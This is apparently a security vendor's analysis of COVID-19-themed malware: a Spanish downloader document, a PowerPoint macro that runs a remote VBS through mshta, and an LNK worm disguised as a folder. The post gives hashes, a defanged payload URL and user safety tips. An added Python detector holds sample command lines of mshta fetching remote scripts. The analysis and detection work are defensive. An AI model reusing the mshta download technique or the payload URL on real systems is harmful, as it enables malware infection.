As health care workers battle the COVID-19 pandemic on the front line to keep people safe, security professionals continue to combat coronavirus-related malware to secure the cyber world. Government and health officials have been publishing guidelines to prevent the virus, and it comes as no surprise that hackers have been exploiting it once again. ASEC (AhnLab Security Emergency-response Center) analysts have analyzed the latest COVID-19 related malware.
AhnLab’s security experts have been continuously analyzing COVID-19 related malware. According to ASEC analysts, malware distribution began in late February. Malware disguised as COVID-19 relevant information was distributed through files attached to spearphishing emails. Although the earlier malware versions were found to be tests or mere pranks, the later versions became more serious, taking the form of malicious threats such as backdoors and downloaders.
Malware Disguised as a COVID-19 Prevention Handbook
• File Name: Medidas Preventivas contra el COVID-19.doc
• MD5: 6862a4ed7c8e3341fed411245028b35b
• Alias: W97M/Downloader
Hackers have been disguising malware as COVID-19 relevant information as a way to distribute it. In the recent attacks, malware disguised as a COVID-19 prevention handbook has been discovered. It may seem harmless but is, in fact, malicious. The document is written in Spanish, as shown in Figure 1.
Figure 1. Malicious Document Disguised as COVID-19 Prevention Handbook
COVID-19 Related Macro Malware
• File Name: Relação de Hotéis e Hospedes - Estado afetado pelo COVID-19 (Novo Corona vírus).pps
• MD5: 90e495357a4c9a4bb1e9cab4b9664367
• Alias: Downloader/Ppt.Generic
Another type of malware has been found in a malicious PowerPoint (PPT) file. Once the file is executed, the macro code shown in Figure 2 automatically runs a VBS script hosted at hxxps://omecanism2.sslblindado.com/coronavirus.mp3 through mshta. AhnLab’s anti-malware product, V3, blocks the relevant malware using the alias Malware/Win32.RL_SpyGate.
Figure 2. Malicious Macro within COVID-19 Related Document
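The behavior described above (an Office application starting mshta with a remote URL) can be hunted for in process-creation logs. The following Python sketch is an added example, not code from ASEC or AhnLab. It assumes events exported as one JSON object per line with Sysmon-style field names (Computer, ParentImage, Image, CommandLine) and that mshta is started as a direct child of the Office process; the sample events and the example.invalid URLs are constructed.

```python
import json
import re

# Office applications that have no normal reason to start a script host.
OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
# mshta runs the script found at a URL passed on its command line.
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample events, one JSON object per line (not real telemetry).
SAMPLE_LOG = r'''
{"Computer": "ws01", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\POWERPNT.EXE", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe https://files.example.invalid/update.mp3"}
{"Computer": "ws02", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe C:\\Tools\\inventory.hta"}
{"Computer": "ws03", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\MSHTA.EXE", "CommandLine": "MSHTA HTTP://files.example.invalid/a.hta"}
{"Computer": "ws04", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\POWERPNT.EXE", "Image": "C:\\Windows\\System32\\splwow64.exe", "CommandLine": "splwow64.exe 8192"}
'''

def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_events(text):
    """Parse JSON-lines text into a list of event dictionaries."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def detect_office_mshta(events):
    """Return one alert per event where an Office app starts mshta with a URL."""
    alerts = []
    for ev in events:
        if basename(ev.get("Image", "")) != "mshta.exe":
            continue  # not the script host we are looking for
        parent = basename(ev.get("ParentImage", ""))
        if parent not in OFFICE_PARENTS:
            continue  # mshta started by something other than Office
        match = REMOTE_URL.search(ev.get("CommandLine", ""))
        if match:  # local .hta files are ignored; only remote content alerts
            alerts.append({"host": ev.get("Computer"), "parent": parent,
                           "url": match.group(0)})
    return alerts

if __name__ == "__main__":
    for alert in detect_office_mshta(parse_events(SAMPLE_LOG)):
        print("ALERT", alert)
```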
COVID-19 Related Worm Malware
• File Name: Covid 19.lnk
• MD5: ba3f0d0603a030fd64f5d15fc14ed34e
• Alias: LNK/Runner
The last type of malware discovered by ASEC analysts was an LNK file disguised with a folder icon. Once executed, it runs the Manuel.doc file, which is an encoded VB script. It then opens the COVID-19 folder to trick the user into believing that the LNK file is a real folder. This malware is similar to the Forbix worm and can perform additional malicious behavior depending on the executed scripts.
To prevent damage from malware disguised as COVID-19 related information, users must follow basic security measures:
• Always check the email recipient before taking further actions
• Avoid opening files attached to emails from unknown or suspicious sources
• Install the latest security patches for programs such as the OS, Internet browsers, application programs, and office software
• Keep anti-malware products, such as V3, up to date